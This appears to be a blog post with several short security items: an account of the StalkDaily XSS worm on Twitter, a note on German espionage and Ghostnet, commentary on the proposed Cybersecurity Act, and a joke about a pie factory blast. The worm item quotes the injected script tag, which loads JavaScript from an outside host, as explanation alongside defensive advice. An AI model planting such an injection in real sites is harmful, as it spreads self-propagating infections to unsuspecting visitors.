DCortesi has posted a nice summary of a script exploit in Twitter

I knew something was up. Looking at one of the infected profiles I saw a link to the StalkDaily site, but then also some script tags. These typically aren’t allowed as part of a profile URL and looked suspicious:

<a href="http://www.stalkdaily.com">
<script src="hxxp://mikeyylolz.uuuq.com/x.js%3E">
</script></a>

Twitter allowed encoding in a profile’s URL field, so the malicious JavaScript would run as soon as someone viewed a compromised twitter profile page. Then anyone who looked at your page would be infected as well, and so forth.

An excellent way to prevent this is with “noscript” or similar utilities that require you to whitelist javascript, as DCortesi mentions. You would be prompted to allow a uuuq.com script, at which point you hopefully would say no and realize the twitter page is compromised. This is not foolproof, of course, as many would not realize that uuuq.com is suspicious. Another method of prevention is to avoid using Twitter. Haha.

Countless pies have been lost and a baker killed in a massive blast in England. The news reports have released few details so far

The explosion wrecked the Andrew Jones Pies factory in Old Leeds Road early this morning and police confirmed shortly before 11am that one person had died as the brick-built building was shattered by the blast.

Although they made a chicken pot pie, fowl play is not suspected.

Spiegel Online provides some details on espionage detected in Germany, including the ‘Ghostnet’

German intelligence also detected a noticeable increase in cyber attacks before meetings between Merkel and the Dalai Lama. The hackers appear to be particularly interested in the Tibet issue. In January 2008, various German officials received an e-mail with an attached document titled: “Analysis of Chinese Government Policy Toward Tibet.” The sender was supposedly a Tibetan organization in the United States. A malicious program was hidden in the analysis.

The giant question, of course, is whether anyone can trace anything conclusively. Since plausible denial is so effective in the physical world, I suspect technology will generate the same results only faster. Sloppy work by the spies will lead to convictions, but otherwise there will be a tangled web of dead ends to sift through, creating demand for better correlation and monitoring tools.

The US Congress is reviewing proposed legislation that gives the President the ability to disconnect any federal government or critical infrastructure cyber (for lack of a better word) system. The Cybersecurity Act, also known as Rockefeller/Snowe, begins ominously:

9 The Congress finds the following:
10 (1) America’s failure to protect cyberspace is
11 one of the most urgent national security problems
12 facing the country.

It then provides quotes from a number of sources that say technology underpins the economy and is significantly weaker than more conventional infrastructure. Here is number ten, for example:

1 (10) According to the National Journal, Mike
2 McConnell, the former Director of National Intel
3 ligence, told President Bush in May 2007 that if the
4 9/11 attackers had chosen computers instead of air
5 planes as their weapons and had waged a massive
6 assault on a U.S. bank, the economic consequences
7 would have been ‘‘an order of magnitude greater’’
8 than those cased by the physical attack on the
9 World Trade Center. Mike McConnell has subse
10 quently referred to cybersecurity as the ‘‘soft under
11 belly of this country.’’

Scary. But help is on the way. A Cybersecurity Advisory Panel is to be created that will represent everyone and advise the President. Paller must be crushed that this does not just say SANS will be given the task…

One of the more interesting tasks is a monitoring dashboard assigned to the Secretary of Commerce.

20 …implement
21 a system to provide dynamic, comprehensive, real
22 time cybersecurity status and vulnerability informa
23 tion of all Federal government information systems
24 and networks managed by the Department of Com
25 merce

In a similar vein, the Director of NIST is expected to build a dashboard to measure and illustrate the economics of cyber security.

21 These
22 metrics should measure risk reduction and the cost
23 of defense. The research shall include the develop
24 ment automated tools to assess vulnerability and
25 compliance.

I get where they were trying to go with all this, but it really rough around the edges. The enforcement section is practically empty and ideas like the vulnerability specification language that will “communicate vulnerability data to software users in real time” seem strangely out of place. Do we really need a vulnerability language in a federal act? Who wants secure domain name addressing system run out of a federal mandate?

Hard not to notice that there also is a provision for mandatory cybersecurity professional licensing. I think it is great that information security is getting a big focus in the stimulus and infrastructure projects but I find it hard to believe anyone will really support so much power being placed under the executive branch.